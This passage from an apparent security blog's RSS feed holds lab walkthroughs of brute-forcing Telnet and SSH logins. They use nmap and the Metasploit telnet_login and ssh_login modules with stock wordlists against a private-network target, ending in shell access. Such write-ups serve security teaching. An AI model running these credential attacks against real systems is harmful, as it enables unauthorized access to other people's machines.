&lt;pre&gt;&lt;code&gt;use auxiliary/scanner/telnet/telnet_login
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405152658.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 4: Set target IP&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;set RHOSTS &amp;lt;target-ip&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405152747.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 5: Set username and password list&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
set PASS_FILE +
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405152841.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 6: Run the module&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;run
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405152955.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;6. Result&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Metasploit successfully identifies valid Telnet credentials.&lt;/li&gt;
&lt;li&gt;Using these credentials, shell access is obtained.&lt;/li&gt;
&lt;li&gt;The attacker can execute commands on the target system.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;whoami
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405153131.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
</content:encoded><author>Katy Kookaburra</author></item><item><title>SSH Weak Credentials Exploitation</title><link>https://multiterm.stelclementine.com/posts/ssh-exploitation-report</link><guid isPermaLink="true">https://multiterm.stelclementine.com/posts/ssh-exploitation-report</guid><description>Brute-force attack on SSH service with weak credentials walkthrough.</description><pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;&lt;strong&gt;1. What is SSH?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;SSH (Secure Shell) is a network protocol used to securely access and manage systems over a TCP/IP network. It typically runs on &lt;strong&gt;port 22&lt;/strong&gt; and provides encrypted communication between client and server.&lt;/p&gt;
&lt;p&gt;SSH supports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Secure remote login&lt;/li&gt;
&lt;li&gt;Encrypted command execution&lt;/li&gt;
&lt;li&gt;Secure file transfer (SCP, SFTP)&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;2. How SSH Works&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;SSH works on a &lt;strong&gt;client-server architecture&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Port 22:&lt;/strong&gt; Used for secure communication&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Process:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Client connects to the SSH server&lt;/li&gt;
&lt;li&gt;Server presents its public key&lt;/li&gt;
&lt;li&gt;Client verifies the server&lt;/li&gt;
&lt;li&gt;User authenticates using password or key&lt;/li&gt;
&lt;li&gt;Secure shell access is established&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;3. Vulnerability Exploited&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Vulnerability Name:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Weak Credentials in SSH Service&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Type:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Authentication Weakness / Brute Force&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;CVE:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;N/A (Configuration-based vulnerability)&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Description:&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The service running on port &lt;strong&gt;22/tcp&lt;/strong&gt; is identified as &lt;strong&gt;OpenSSH 4.7p1 Debian 8ubuntu1&lt;/strong&gt;. The SSH service is vulnerable due to weak or default credentials, allowing attackers to gain unauthorized access through brute-force attacks using automated tools.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;4. How the Exploit Works (Concept)&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The attacker scans the target and finds SSH running on port 22.&lt;/li&gt;
&lt;li&gt;The service version is identified as OpenSSH 4.7p1.&lt;/li&gt;
&lt;li&gt;The attacker uses a brute-force module in Metasploit.&lt;/li&gt;
&lt;li&gt;Multiple username and password combinations are attempted.&lt;/li&gt;
&lt;li&gt;Valid credentials are discovered.&lt;/li&gt;
&lt;li&gt;The attacker logs in and gains secure shell access.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;5. Exploitation&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;Recon using Nmap&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;nmap -sV 192.168.72.130
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405140326.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 1: Start Metasploit&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;msfconsole
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;/images/posts/Pasted%20image%2020260405193548.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Step 2: Search for SSH modules&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;search ssh
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Step 3: Use SSH login module&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;use auxiliary/scanner/ssh/ssh_login
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Step 4: Set target IP&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;set RHOSTS &amp;lt;target-ip&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Step 5: Set username and password list&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Step 6: Run the module&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;run
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Step 7: Get a shell using valid credentials&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;use auxiliary/scanner/ssh/ssh_login
set USERNAME &amp;lt;found-user&amp;gt;
set PASSWORD &amp;lt;found-password&amp;gt;
set RHOSTS &amp;lt;target-ip&amp;gt;
run
&lt;/code&gt;&lt;/pre&gt;
&lt;hr /&gt;
&lt;h2&gt;&lt;strong&gt;6. Result&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Metasploit successfully discovers valid SSH credentials.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Secure shell access is obtained on the target machine.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Commands can be executed with the privileges of the authenticated user.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;whoami
&lt;/code&gt;&lt;/pre&gt;
</content:encoded><author>Katy Kookaburra</author></item></channel></rss>